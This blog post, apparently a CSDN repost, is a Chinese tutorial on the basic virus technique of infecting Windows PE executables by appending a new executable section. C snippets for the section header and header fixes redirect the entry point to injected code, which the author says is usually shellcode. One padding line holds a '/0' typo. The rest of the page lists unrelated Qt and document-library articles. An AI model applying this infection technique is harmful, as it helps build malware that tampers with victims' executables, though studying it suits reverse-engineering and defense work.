AddSection

最新推荐文章于 2023-06-06 13:05:25 发布
最新推荐文章于 2023-06-06 13:05:25 发布
阅读量835 收藏
点赞数
分类专栏: 病毒汇编和调试逆向技术加脱壳 文章标签: 磁盘 import image file byte
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/3086677
版权
 

PE感染,古老的话题!好久不玩感染,连最基本的添加新节的方式都迷糊了,遂巩固基本功,重新捡起来学习.
PE的那堆结构应该再熟悉不过了,略过.总结几个重点:
    ----------------------------------------------------------------------------
     NewSection.VirtualAddress   ┐
     NewSection.Misc.VirtualSize ┘定位 内存中 下个节的地址

     NewSection.SizeOfRawData      ┐
     NewSection.PointerToRawData ┘定位 磁盘中 下个节的地址

     OptionalHeader.SizeOfImage - 内存中整个PE的大小
     OptionalHeader.SizeOfCode   - 磁盘中整个代码块的大小
    ----------------------------------------------------------------------------

就下面几步,别人问你最基本的病毒感染方式时,你可别答漏了哦:
    ──────
      ︳ sudami ︳
      ︳08/08/28 ︳
      ──────
1.增加新节 - 定位到文件的最后,写入新节的内容length,末尾要增加5字节数据"jmp OEP"
    BYTE jmp = 0xE9;
    OEP = OEP-(NewSection.VirtualAddress+length)-5;
    fwrite(&jmp, sizeof(jmp), 1, newfile);
    fwrite(&OEP, sizeof(OEP), 1, newfile);

计算length在文件中的对齐大小,剩余部分填0
    for(i=0;i<alig(length,FILE_ALIG)-length-5;i++) {
    fputc('/0',newfile);
    }

2.增加新节表 - 有5处要填写的地方:
节表名、该节的磁盘偏移量、该节的磁盘大小、该节对齐后的内存大小、该节属性
    strcpy((char*)NewSection.Name,".sudami");
    NewSection.PointerToRawData = LastSectionTable.PointerToRawData+LastSectionTable.SizeOfRawData;
    NewSection.SizeOfRawData = alig(length,FILE_ALIG);
    NewSection.Misc.VirtualSize = length;
    NewSection.Characteristics = 0xE0000020; //新区块可读可写可执行

3.最后该修正可选头中的几个参数值了:
    int nNewImageSize = NThea.OptionalHeader.SizeOfImage + alig(length,SECTION_ALIG);
    int nNewSizeofCode = NThea.OptionalHeader.SizeOfCode + alig(length,FILE_ALIG);
    // 绑定输入,还是修改下比较好
    NThea.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress=0;
    NThea.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size=0;
    NThea.OptionalHeader.SizeOfCode   = nNewSizeofCode; // 修正磁盘中整个代码块的大小
    NThea.OptionalHeader.SizeOfImage = nNewImageSize;   // 修正内存中整个PE的大小
    NThea.FileHeader.NumberOfSections = nOldSectionNo+1; // 节表数加1
    NThea.OptionalHeader.AddressOfEntryPoint=NewSection.VirtualAddress; // 修改OEP

OK,新节的内容多数时候是shellcode吧,一般很简单的.嘿嘿...

iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【python-docx】对文档的操作的 add_section() 和 add_page_break() 区别
qq_50256790的博客
05-04 1919
对python-docx中文档的add_page_break()和add_section()的理解
Qt应用开发(基础篇)——菜单 QMenu
波塞冬的博客
09-12 5108
QMenu类继承于QWidget,它提供了一个菜单样式的小部件,用于菜单栏、上下文菜单和一些弹出式菜单。QMenu菜单的选项是可选的,它可以是一个下拉的菜单,也可以是独立的上下文菜单。下拉菜单通常作用于当用户单击相应的项目或按下指定的快捷键时,使用QMenuBar::addMenu()将菜单插入到菜单栏中,菜单栏将显示下拉菜单。上下文菜单通常通过一些特殊的键盘键或右键来调用。它们可以用popup()异步执行,也可以用exec()同步执行。当然菜单也可以在一些触发事件中调用,比如按下按钮时。QMenu。
python-docx add_section 分栏不换页
qq1261275789的博客
08-17 1082
python-docx add_section 分栏不换页
Qt扫盲-QMenu理论总结
洪源兄
01-12 4519
QMenu其实就是菜单控件,菜单控件本质上就是一个选择项目。它可以是菜单栏中的下拉菜单,也可以是独立的上下文菜单。当用户单击相应的位置或按下指定的快捷键时,下拉菜单由菜单栏显示。使用QMenuBar::addMenu()向菜单栏插入一个菜单。当然菜单同样也是可以嵌套使用,也就是按钮里面嵌套按钮的。样子就像这种单层菜单还有嵌套的菜单。
33-按钮控件
*****
06-06 494
QAbstractButton类是按钮小部件的抽象基类,提供按钮共有的功能。该类QAbstractButton是按钮小部件的抽象基类,提供按钮通用的功能。子类包含:QAbstractButton提供对按钮和可检查(切换)按钮的支持。可检查按钮在QRadioButton和QCheckBox类中实现。按钮在QPushButton和QToolButton类中实现;如果需要,这些还提供切换行为。可以通过 setDefault()和 setAutoDefault()使按钮成为对话框中的默认按钮。
06302961vc_add_section.rar
07-31
标题“06302961vc_add_section.rar”暗示了这可能是一个与Visual C++(VC)项目相关的压缩文件,其中包含了增加程序段(section)功能的源代码或库。描述中的内容重复了标题,没有提供额外信息,但标签同样强调了...
小雨青年的 PHPWord 专栏配套模板文件
06-01
在上面的代码中,我们使用 addSection() 方法来添加一个新的章节,然后使用 addTitle() 方法来添加标题。我们可以根据需要添加多个标题,并且可以使用不同的级别来表示标题的层次关系。 页码更新 在 WORD 文档中,...
雷工笔记《ini文件操作》源码
最新发布
06-04
- `IniWriter`:用于写入、修改和删除ini文件内容的类,可能包含`AddSection`、`SetKey`、`RemoveKey`等方法。 - `IniParser`:解析ini文件结构的类,可能有`ParseFile`和`BuildStructure`等方法,用于将文件内容...
Java生成PDF文件的实例代码
09-05
Section section1_1 = chapter1.addSection("Section 1.1 - Basics"); section1_1.add(new Paragraph("This is the content of Section 1.1. It provides an introduction to the topic.", normalFont)); Section ...
.NET库生成PDF文档
04-09
.AddSection() .WriteText("Hello, World!"); ``` 这个库的布局引擎是其另一个亮点。布局引擎负责处理文档的排版和格式化,包括字体、字号、颜色、对齐方式、边距、表格、图像等元素。它能够自动调整内容以适应...
底部菜单_AXURE原型——移动端标签、菜单原型集合
weixin_42515842的博客
12-30 415
hello,今天和大家分享移动端菜单合集,里面包括了常用菜单页面、侧栏菜单、弹窗菜单、锚点菜单、顶部标签菜单、和底部标签菜单。然后除了底部和锚点菜单外,其余菜单都是用中继器制作的,交互效果啥的都设置好了,大家只需要填写中继器表格即可使用,非常方便。该原型axure8、9通用原型预览及下载地址:https://www.pmdaniu.com/storages/120856/4f94907795d7b...
python基础之ini文件操作
yiwenrong的博客
04-20 333
一、config.ini 配置文件 [DATABASE] host = 192.1.1.1 username = root password = root port = 3306 database = jforum [URL] #ip,端口 ip =127.0.0.1 port= 8089 二、操作ini常用方法 --read():读取配置文件 --sections():读取配置文件中所有的s...
Qt Widgets——菜单和菜单栏
weixin_33738555的博客
05-05 249
主窗口MainWindow需要菜单栏QMenuBar及菜单QMenu来组成自身,一般应用程序的所有功能都能在菜单中找到。接下来就来说说它们。 QMenu 它添加了很多动作QAction,并用自身组成了菜单栏QMenuBar上的菜单,当然也可用于基它地方,如上下文菜单等。 公有函数如下: QMenu(QWidget * parent = 0) QMenu(const...
QMenu
友善啊,朋友的博客
02-07 5586
一、描述 QMenu 类提供了菜单小部件。 二、属性成员 1、icon : QIcon 菜单的图标。这等效于 menuAction() 的 QAction::icon 属性。 2、separatorsCollapsible : bool 连续分隔符是否应在视觉上折叠为单个分隔符,菜单开头或结尾的分隔符也被隐藏。 默认为 true。 3、tearOffEnabled : bool 菜单是否可脱离。默认为 false。 hideTearOffMenu() 将强制隐藏脱离的菜单,
Qt的section函数介绍
“时光清浅,不觉多年”的博客
02-05 5887
section释义:部分 因此我们可以知道,Qt中的section函数的功能就是从一段字符串中拿出某一段连续的部分。 需要知道的定义:位置的标识 从左到右:0,1,2,3,4,5…… 从又到左:-1,-2,-3,-4,-5…… 这个位置的标识一定要清楚,而且要清楚的是,这个标识是字符串被切分之后的字符串们的编号!!!不是某个字符的位置,而是子字符串的位置。 如字符串为:“aaa/bbb/ccc/ddd/eee/fff” 从左到右的对应编号关系为: 编号 值 0 aaa 1 bbb 2
QMenu实现不规则形状
weixin_43246170的博客
12-03 507
QMenu更改窗口形状的方法有三种,分别是qss,painter和QStyle。这边介绍的是QStyle。 使用到Qstyle来修改控件的样式,一般需要查看这个控件painter的源码。源码相关的这边不做主要介绍,你只需要知道一般标准控件的painter源码中绘制控件的几个接口,分别有: void drawPrimitive(PrimitiveElement element, const QStyleOption *option, QPainter *painter, const QWidget *
qt5 可停靠控件和工具栏_Qt5 菜单栏及其菜单
weixin_39955825的博客
12-21 458
主窗口MainWindow需要菜单栏QMenuBar及菜单QMenu来组成自身,一般应用程序的所有功能都能在菜单中找到。QMenu它添加了很多动作QAction,并用自身组成了菜单栏QMenuBar上的菜单,当然也可用于基它地方,如上下文菜单等。公有函数如下:QMenu(QWidget * parent = 0)QMenu(const QString & title, QWidget * ...
qmenu基本用法_QMenu类(老九学堂C++会员友情翻译,不喜勿喷)
weixin_36390615的博客
02-21 2813
QMenuProperties属性• icon : QIcon该属性保存菜单图标这等效于menuAction()的QAction :: icon属性默认情况下,如果未明确设置任何图标,则此属性包含一个空图标。访问函数QIcon icon() constvoid setIcon(const QIcon &icon)• separatorsCollapsible : bool...
Qt自定义控件01 简易计时器
qq_22328661的博客
04-20 722
控件用于计时,如录音时,录视频时,或者群聊计时等等 class TimeRunningWidget : public QWidget { Q_OBJECT public: explicit TimeRunningWidget(QWidget* parent = nullptr); ~TimeRunningWidget(); void StartRun(); void StopRun(); void ClearTime(); private: .
QT QMenu addSection
05-05
QMenu::addSection() 方法可以在菜单中添加一个新的“分隔符”或“段落”以将菜单项分组。该方法有两个重载: 1. void QMenu::addSection(const QString &text):添加一个只有文本的菜单项,文本即为分组的名称。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值